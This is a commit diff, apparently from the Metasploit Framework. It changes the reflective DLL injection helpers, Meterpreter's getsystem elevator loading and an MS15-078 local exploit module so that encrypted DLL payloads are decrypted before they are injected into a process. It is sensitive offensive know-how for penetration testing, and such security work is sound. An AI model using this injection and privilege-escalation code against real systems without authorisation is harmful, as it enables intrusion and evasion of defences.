Add support for injection of encrypted dll payloads

sjanusz-r7 · Oct 11, 2023 · 14f438d · 14f438d
1 parent ea54268
commit 14f438d
Show file tree

Hide file tree

Showing 4 changed files with 11 additions and 12 deletions.
diff --git a/lib/msf/core/post/windows/reflective_dll_injection.rb b/lib/msf/core/post/windows/reflective_dll_injection.rb
@@ -78,8 +78,9 @@ def inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader',
   # @return [Array] Tuple of allocated memory address and offset to the
   #   +ReflectiveLoader+ function.
   def inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
-    offset = load_rdi_dll_from_data(dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal)
-    dll_mem = inject_into_process(process, dll_data)
+    decrypted_dll_data = ::MetasploitPayloads.decrypt_payload(payload: dll_data)
+    offset = load_rdi_dll_from_data(decrypted_dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal)
+    dll_mem = inject_into_process(process, decrypted_dll_data)
 
     return dll_mem, offset
   end

diff --git a/lib/msf/core/reflective_dll_loader.rb b/lib/msf/core/reflective_dll_loader.rb
@@ -24,8 +24,8 @@ module Msf::ReflectiveDLLLoader
   # @return [Array] Tuple of DLL contents and offset to the
   #                 +ReflectiveLoader+ function within the DLL.
   def load_rdi_dll(dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
-    dll = ''
-    ::File.open(dll_path, 'rb') { |f| dll = f.read }
+    encrypted_dll = ::File.binread(dll_path)
+    dll = ::MetasploitPayloads.decrypt_payload(payload: encrypted_dll)
 
     offset = parse_pe(dll, loader_name: loader_name, loader_ordinal: loader_ordinal)
 
@@ -43,7 +43,8 @@ def load_rdi_dll(dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPO
   #
   # @return [Integer] offset to the +ReflectiveLoader+ function within the DLL.
   def load_rdi_dll_from_data(dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
-    offset = parse_pe(dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal)
+    decrypted_dll_data = ::MetasploitPayloads.decrypt_payload(payload: dll_data)
+    offset = parse_pe(decrypted_dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal)
 
     unless offset
       raise 'Cannot find the ReflectiveLoader entry point in DLL data'

diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -82,11 +82,8 @@ def getsystem(technique=TECHNIQUE[:any])
         raise RuntimeError, "#{elevators.chomp(', ')} not found", caller
       end
 
-      elevator_data = ''
-
-      ::File.open(elevator_path, 'rb') { |f|
-        elevator_data += f.read(f.stat.size)
-      }
+      encrypted_elevator_data = ::File.binread(elevator_path)
+      elevator_data = ::MetasploitPayloads.decrypt_payload(payload: encrypted_elevator_data)
 
       request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data)
       request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length)

diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
@@ -384,8 +384,8 @@ def exploit
     library_path = ::File.expand_path(library_path)
 
     print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
-    dll = ''
-    ::File.open(library_path, 'rb') { |f| dll = f.read }
+    encrypted_dll = ::File.binread(library_path)
+    dll = ::MetasploitPayloads.decrypt_payload(payload: encrypted_dll)
 
     patch_win32k_offsets(dll)
     patch_nt_offsets(dll)